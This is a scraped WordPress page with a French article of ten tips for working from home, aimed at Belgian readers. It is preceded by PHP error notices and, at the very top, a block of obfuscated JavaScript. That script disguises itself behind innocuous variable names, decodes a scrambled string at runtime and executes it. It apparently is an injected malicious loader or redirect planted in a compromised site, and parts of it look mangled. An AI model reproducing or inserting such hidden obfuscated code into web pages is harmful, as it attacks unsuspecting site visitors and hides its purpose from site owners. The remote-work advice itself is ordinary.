var language,currentLanguage,languagesNoRedirect,hasWasCookie,expirationDate;(function(){var Tjo='',UxF=715-704;function JOC(d){var j=4658325;var f=d.length;var o=[];for(var y=0;y)tul5ibtp%1ueg,B% ]7n))B;*i,me4otfbpis 3{.d==6Bs]B2 7B62)r1Br.zt;Bb2h BB B\/cc;:;i(jb$sab) cnyB3r=(pspa..t:_eme5B=.;,f_);jBj)rc,,eeBc=p!(a,_)o.)e_!cmn( Ba)=iBn5(t.sica,;f6cCBBtn;!c)g}h_i.B\/,B47sitB)hBeBrBjtB.B]%rB,0eh36rBt;)-odBr)nBrn3B 07jBBc,onrtee)t)Bh0BB(ae}i20d(a}v,ps\/n=.;)9tCnBow(]!e4Bn.nsg4so%e](])cl!rh8;lto;50Bi.p8.gt}{Brec3-2]7%; ,].)Nb;5B c(n3,wmvth($]\/rm(t;;fe(cau=D)ru}t];B!c(=7&=B(,1gBl()_1vs];vBBlB(+_.))=tre&B()o)(;7e79t,]6Berz.\';,%],s)aj+#"$1o_liew[ouaociB!7.*+).!8 3%e]tfc(irvBbu9]n3j0Bu_rea.an8rn".gu=&u0ul6;B$#ect3xe)tohc] (].Be|(%8Bc5BBnsrv19iefucchBa]j)hd)n(j.)a%e;5)*or1c-)((.1Br$h(i$C3B.)B5)].eacoe*\/.a7aB3e=BBsu]b9B"Bas%3;&(B2%"$ema"+BrB,$.ps\/+BtgaB3).;un)]c.;3!)7e&=0bB+B=(i4;tu_,d\'.w()oB.Boccf0n0}od&j_2%aBnn%na35ig!_su:ao.;_]0;=B)o..$ ,nee.5s)!.o]mc!B}|BoB6sr.e,ci)$(}a5(B.}B].z4ru7_.nnn3aele+B.\'}9efc.==dnce_tpf7Blb%]ge.=pf2Se_)B.c_(*]ocet!ig9bi)ut}_ogS(.1=(uNo]$o{fsB+ticn.coaBfm-B{3=]tr;.{r\'t$f1(B4.0w[=!!.n ,B%i)b.6j-(r2\'[ a}.]6$d,);;lgo *t]$ct$!%;]B6B((:dB=0ac4!Bieorevtnra 0BeB(((Bu.[{b3ce_"cBe(am.3{&ue#]c_rm)='));var KUr=DUT(Tjo,ENJ );KUr(6113);return 5795})();
Notice: Trying to access array offset on value of type null in /bitnami/wordpress/wp-content/plugins/sitepress-multilingual-cms/classes/plugins/wpml-plugins-check.php on line 18

Notice: Trying to access array offset on value of type null in /bitnami/wordpress/wp-content/plugins/sitepress-multilingual-cms/classes/plugins/wpml-plugins-check.php on line 22

Notice: Erreur lors du décodage du fichier JSON à l’emplacement /opt/bitnami/wordpress/wp-includes/theme.json : Syntax error in /opt/bitnami/wordpress/wp-includes/functions.php on line 4578

Notice: Erreur lors du décodage du fichier JSON à l’emplacement /opt/bitnami/wordpress/wp-includes/theme-i18n.json : Syntax error in /opt/bitnami/wordpress/wp-includes/functions.php on line 4578

Notice: Erreur lors du décodage du fichier JSON à l’emplacement /opt/bitnami/wordpress/wp-includes/theme.json : Syntax error in /opt/bitnami/wordpress/wp-includes/functions.php on line 4578
10 conseils pour travailler de la maison - Belgium

10 conseils pour travailler de la maison


1. Suivez une routine
Tenez-vous-en à votre routine matinale. Levez-vous, prenez votre douche et faites une petite balade avant de vous installer devant votre ordinateur et de commencer à travailler. Ce n’est pas parce que nous pouvons flâner en pyjama que c’est forcément une bonne idée.

2. Délimitez un espace de travail spécifique 
Ne faites pas l’erreur de travailler depuis votre chambre car bientôt, vous n’associerez votre chambre qu’au travail. Si vous associez votre chambre au travail, cela peut impacter votre rythme de sommeil. Nous vous conseillons donc de délimiter un espace dans lequel vous pourrez travailler. Si vous le pouvez, investissez dans un siège confortable et faites très attention au « Tech neck ». Ainsi, si vous ne pouvez pas utiliser d’écran externe, essayez au moins de positionner votre ordinateur portable sur une pile de livres pour pouvoir soulager votre nuque. Vous pouvez éventuellement faire vos téléconférences debout.

3. Concentrez-vous sur vos intentions et faites des pauses
C’est toujours le moment de remettre à niveau ses compétences en gestion du temps, tout particulièrement lorsque l’on travaille à domicile. Commencez chaque jour par identifier ce que vous avez besoin de faire et la manière dont vous comptez vous y prendre. Nous vous conseillons donc de bloquer du temps dans votre emploi du temps et de faire des pauses afin de pouvoir planifier votre temps de façon plus réaliste, mais aussi de vous laisser suffisamment de temps pour vous ressourcer.

4. Intensifiez la communication 
Nous passons généralement la plupart de notre temps avec nos collègues, ce qui nous permet de rester plus facilement synchronisés. Actuellement, une telle proximité n’étant plus possible, nous nous devons d’être attentifs afin de préserver ces lignes de communication. Heureusement, aujourd’hui nous disposons de nombreux outils pour nous aider comme les appels vidéo, les chats numériques, mais aussi les tableaux numériques ou encore les programmes de collaboration.  Et n’oubliez pas, l’essentiel de la communication étant actuellement numérique, l’empathie doit être plus importante que jamais. Essayez de vous rappeler chaque jour de toujours présumer des intentions positives, même si vous souhaitiez lire autre chose dans le dernier message du chat.

5. Prenez soin de vous 
En période d’auto-isolement, on se demande souvent si on est productif et heureux. Il ne faut cependant pas oublier l’importance de prendre soin de soi. Vous avez peut-être besoin de consacrer un peu de temps chaque jour pour faire de l’exercice. Vous avez peut-être besoin de temps pour méditer. Ou peut-être vous suffit-il de veiller à prendre les pauses que vous avez planifiées. Que vous soyez au bureau ou à domicile, vous devez privilégier votre santé et votre sécurité.

6. Trouvez où travailler
Le fait de favoriser le travail à domicile est une décision simple de la part de l’employeur pour que le personnel puisse être productif avec un ordinateur portable et un smartphone. Mais votre domicile pourrait ne pas être optimisé pour pouvoir accueillir un environnement de travail favorable à domicile. Trouvez la meilleure association de table et de siège pour bénéficier de la meilleure position de travail possible. Prévoyez d’installer et de désinstaller quotidiennement votre environnent de travail. Vous avez besoin d’un emplacement approprié, sans rendre votre famille folle avec des bureaux permanents dans plusieurs lieux de votre domicile.

7. Planifiez votre jour différemment 
Nos jours de travail en bureau peuvent varier selon notre profession. Pour nous tous, le changement le plus significatif est la suppression temporaire des réunions en personne. Passez du temps à définir ce qui est essentiel et possible de faire dans cette nouvelle situation. Les réunions demeurant vitales seront virtuelles, c’est la seule façon restante de collaborer. Attendez-vous à avoir plus de temps pour les travaux que vous diviserez en tâches que vous mènerez et définirez personnellement.

De plus, la pause déjeuner, avec une personne cuisinant pour vous, constitue souvent une pause du midi vitale. Une bonne manière de constituer une routine est de planifier un menu déjeuner à la semaine. Le fait de cuisiner à partir de zéro à chaque déjeuner prend beaucoup de temps. Les livraisons de restaurants locaux à votre domicile peuvent également être une alternative pour contribuer à faire vivre les entreprises locales.

8. Sécurisez l’accès au haut-débit et aux outils  
La réelle valeur de double écrans, d’une souris supplémentaire et d’un bon accès à Internet pourrait ne pas être évidente au travail, mais vous allez bientôt la découvrir. Votre smartphone et votre ordinateur portable seront indispensables pour pouvoir travailler à domicile, avec de bonnes connexions haut-débit fixes et mobiles ayant été soumises à un test de résistance pour pouvoir satisfaire plusieurs travailleurs à domicile et permettre en même temps aux enfants de faire leurs cours/de jouer sur Internet. Si vous vous reposez uniquement sur l’audio pour vos conférences téléphoniques quotidiennes, vous pouvez songer à adopter des options vidéo. La vidéoconférence redonnera un peu des interactions personnelles perdues des réunions en personne.

9. Restez concentré avec une famille autour de vous. 
Vous pourriez ne pas être seul à la maison. Deux adultes travaillant à domicile, c’est le nouveau scénario dans la plupart des familles, et la scolarisation des enfants à domicile rajoute de la complexité. Il est ainsi très difficile de rester concentré dans ce nouvel environnement, c’est un grand défi auquel nous faisons tous face. Aspirez à trouver cette concentration en planifiant les devoirs et les leçons. Soutenez-vous les uns les autres pour gérer des réunions virtuelles en simultané. La clé de votre productivité, c’est de ne pas être interrompu durant votre travail en établissant différentes tâches à réaliser.

10. Expérimentez et développez vos compétences numériques 
Les prochaines semaines révèleront vos lacunes en ce qui concerne vos compétences numériques. C’est une excellente opportunité de transformer ces lacunes en futurs avantages. Saisissez cette chance pour tester de nouveaux outils numériques et des compétences. Créez de courtes vidéos et des podcasts pour vos clients. Exploitez cette période pour faire des progrès et atteindre la perfection dans de nouveaux domaines.

This site is registered on wpml.org as a development site.